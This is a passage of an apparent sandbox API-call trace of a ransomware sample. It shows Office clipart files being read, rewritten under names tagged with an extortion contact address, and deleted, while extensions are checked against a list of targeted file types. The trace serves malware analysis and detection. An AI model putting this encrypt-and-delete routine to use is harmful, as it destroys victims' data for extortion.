nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x2460, lpOverlapped=0x0) returned 1 [0272.960] ReadFile (in: hFile=0x2ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.960] WriteFile (in: hFile=0x398, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.960] SetEndOfFile (hFile=0x398) returned 1 [0272.960] CloseHandle (hObject=0x398) returned 1 [0272.960] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.960] SetEndOfFile (hFile=0x2ac) returned 1 [0272.962] CloseHandle (hObject=0x2ac) returned 1 [0272.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.962] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf")) returned 1 [0272.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.963] lstrlenW (lpString=".doc") returned 4 [0272.963] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.963] lstrlenW (lpString=".docx") returned 5 [0272.963] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.963] lstrlenW (lpString=".pdf") returned 4 [0272.963] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.963] lstrlenW (lpString=".xls") returned 4 [0272.963] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.963] lstrlenW (lpString=".xlsx") returned 5 [0272.963] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.963] lstrlenW (lpString=".ppt") returned 4 [0272.963] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.963] lstrlenW (lpString=".zip") returned 4 [0272.963] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.963] lstrlenW (lpString=".rar") returned 4 [0272.963] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.963] lstrlenW (lpString=".bz2") returned 4 [0272.963] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.963] lstrlenW (lpString=".7z") returned 3 [0272.963] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.963] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.963] lstrlenW (lpString=".dbf") returned 4 [0272.964] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.964] lstrlenW (lpString=".1cd") returned 4 [0272.964] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.964] lstrlenW (lpString=".jpg") returned 4 [0272.964] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.964] lstrlenW (lpString=".doc") returned 4 [0272.964] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.964] lstrlenW (lpString=".docx") returned 5 [0272.964] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.964] lstrlenW (lpString=".pdf") returned 4 [0272.964] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.964] lstrlenW (lpString=".xls") returned 4 [0272.964] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.964] lstrlenW (lpString=".xlsx") returned 5 [0272.964] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.964] lstrlenW (lpString=".ppt") returned 4 [0272.964] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.964] lstrlenW (lpString=".zip") returned 4 [0272.964] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.964] lstrlenW (lpString=".rar") returned 4 [0272.964] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.964] lstrlenW (lpString=".bz2") returned 4 [0272.964] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.964] lstrlenW (lpString=".7z") returned 3 [0272.965] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.965] lstrlenW (lpString=".dbf") returned 4 [0272.965] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.965] lstrlenW (lpString=".1cd") returned 4 [0272.965] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned 63 [0272.965] lstrlenW (lpString=".jpg") returned 4 [0272.965] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.965] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.965] lstrlenW (lpString="HH00693_.WMF") returned 12 [0272.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0272.965] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=7098) returned 1 [0272.965] CloseHandle (hObject=0x2ac) returned 1 [0272.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf")) returned 0x20 [0272.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0272.966] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.966] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0272.966] GetLastError () returned 0x0 [0272.966] ReadFile (in: hFile=0x2ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x1bba, lpOverlapped=0x0) returned 1 [0272.983] WriteFile (in: hFile=0x398, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x1bc0, lpOverlapped=0x0) returned 1 [0272.984] ReadFile (in: hFile=0x2ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.984] WriteFile (in: hFile=0x398, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.984] SetEndOfFile (hFile=0x398) returned 1 [0272.984] CloseHandle (hObject=0x398) returned 1 [0272.984] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.984] SetEndOfFile (hFile=0x2ac) returned 1 [0272.986] CloseHandle (hObject=0x2ac) returned 1 [0272.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.996] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf")) returned 1 [0273.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.004] lstrlenW (lpString=".doc") returned 4 [0273.004] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.004] lstrlenW (lpString=".docx") returned 5 [0273.005] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.005] lstrlenW (lpString=".pdf") returned 4 [0273.005] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.005] lstrlenW (lpString=".xls") returned 4 [0273.005] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.005] lstrlenW (lpString=".xlsx") returned 5 [0273.005] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.005] lstrlenW (lpString=".ppt") returned 4 [0273.005] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.005] lstrlenW (lpString=".zip") returned 4 [0273.005] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.005] lstrlenW (lpString=".rar") returned 4 [0273.005] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.005] lstrlenW (lpString=".bz2") returned 4 [0273.005] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.005] lstrlenW (lpString=".7z") returned 3 [0273.005] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.005] lstrlenW (lpString=".dbf") returned 4 [0273.005] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.005] lstrlenW (lpString=".1cd") returned 4 [0273.005] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.005] lstrlenW (lpString=".jpg") returned 4 [0273.005] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.006] lstrlenW (lpString=".doc") returned 4 [0273.006] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.006] lstrlenW (lpString=".docx") returned 5 [0273.006] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.006] lstrlenW (lpString=".pdf") returned 4 [0273.006] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.006] lstrlenW (lpString=".xls") returned 4 [0273.006] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.006] lstrlenW (lpString=".xlsx") returned 5 [0273.006] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.006] lstrlenW (lpString=".ppt") returned 4 [0273.006] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.006] lstrlenW (lpString=".zip") returned 4 [0273.006] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.006] lstrlenW (lpString=".rar") returned 4 [0273.006] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.006] lstrlenW (lpString=".bz2") returned 4 [0273.006] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.006] lstrlenW (lpString=".7z") returned 3 [0273.006] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.006] lstrlenW (lpString=".dbf") returned 4 [0273.006] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.006] lstrlenW (lpString=".1cd") returned 4 [0273.006] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 63 [0273.006] lstrlenW (lpString=".jpg") returned 4 [0273.006] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.007] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.007] lstrlenW (lpString="HH01080_.WMF") returned 12 [0273.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.007] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=5000) returned 1 [0273.007] CloseHandle (hObject=0x2b0) returned 1 [0273.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf")) returned 0x20 [0273.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.007] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.007] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.008] GetLastError () returned 0x0 [0273.008] ReadFile (in: hFile=0x2b0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x1388, lpOverlapped=0x0) returned 1 [0273.014] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x1390, lpOverlapped=0x0) returned 1 [0273.015] ReadFile (in: hFile=0x2b0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.015] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.015] SetEndOfFile (hFile=0x3b0) returned 1 [0273.015] CloseHandle (hObject=0x3b0) returned 1 [0273.015] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.015] SetEndOfFile (hFile=0x2b0) returned 1 [0273.017] CloseHandle (hObject=0x2b0) returned 1 [0273.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.017] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf")) returned 1 [0273.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.018] lstrlenW (lpString=".doc") returned 4 [0273.018] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.018] lstrlenW (lpString=".docx") returned 5 [0273.018] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.018] lstrlenW (lpString=".pdf") returned 4 [0273.018] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.018] lstrlenW (lpString=".xls") returned 4 [0273.018] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.018] lstrlenW (lpString=".xlsx") returned 5 [0273.018] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.018] lstrlenW (lpString=".ppt") returned 4 [0273.018] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.018] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.019] lstrlenW (lpString=".zip") returned 4 [0273.019] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.019] lstrlenW (lpString=".rar") returned 4 [0273.019] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.019] lstrlenW (lpString=".bz2") returned 4 [0273.019] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.019] lstrlenW (lpString=".7z") returned 3 [0273.019] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.019] lstrlenW (lpString=".dbf") returned 4 [0273.019] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.019] lstrlenW (lpString=".1cd") returned 4 [0273.019] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.019] lstrlenW (lpString=".jpg") returned 4 [0273.019] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.019] lstrlenW (lpString=".doc") returned 4 [0273.019] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.019] lstrlenW (lpString=".docx") returned 5 [0273.019] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.019] lstrlenW (lpString=".pdf") returned 4 [0273.019] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.019] lstrlenW (lpString=".xls") returned 4 [0273.019] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.019] lstrlenW (lpString=".xlsx") returned 5 [0273.019] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.019] lstrlenW (lpString=".ppt") returned 4 [0273.019] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.020] lstrlenW (lpString=".zip") returned 4 [0273.020] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.020] lstrlenW (lpString=".rar") returned 4 [0273.020] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.020] lstrlenW (lpString=".bz2") returned 4 [0273.020] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.020] lstrlenW (lpString=".7z") returned 3 [0273.020] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.020] lstrlenW (lpString=".dbf") returned 4 [0273.020] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.020] lstrlenW (lpString=".1cd") returned 4 [0273.020] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 63 [0273.020] lstrlenW (lpString=".jpg") returned 4 [0273.020] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.020] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.020] lstrlenW (lpString="HH01291_.WMF") returned 12 [0273.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.023] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=15806) returned 1 [0273.024] CloseHandle (hObject=0x3a8) returned 1 [0273.024] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf")) returned 0x20 [0273.024] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.024] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.024] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.025] GetLastError () returned 0x0 [0273.025] ReadFile (in: hFile=0x3a8, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x3dbe, lpOverlapped=0x0) returned 1 [0273.026] WriteFile (in: hFile=0x388, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x3dc0, lpOverlapped=0x0) returned 1 [0273.027] ReadFile (in: hFile=0x3a8, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.027] WriteFile (in: hFile=0x388, lpBuffer=0x35c0020*, 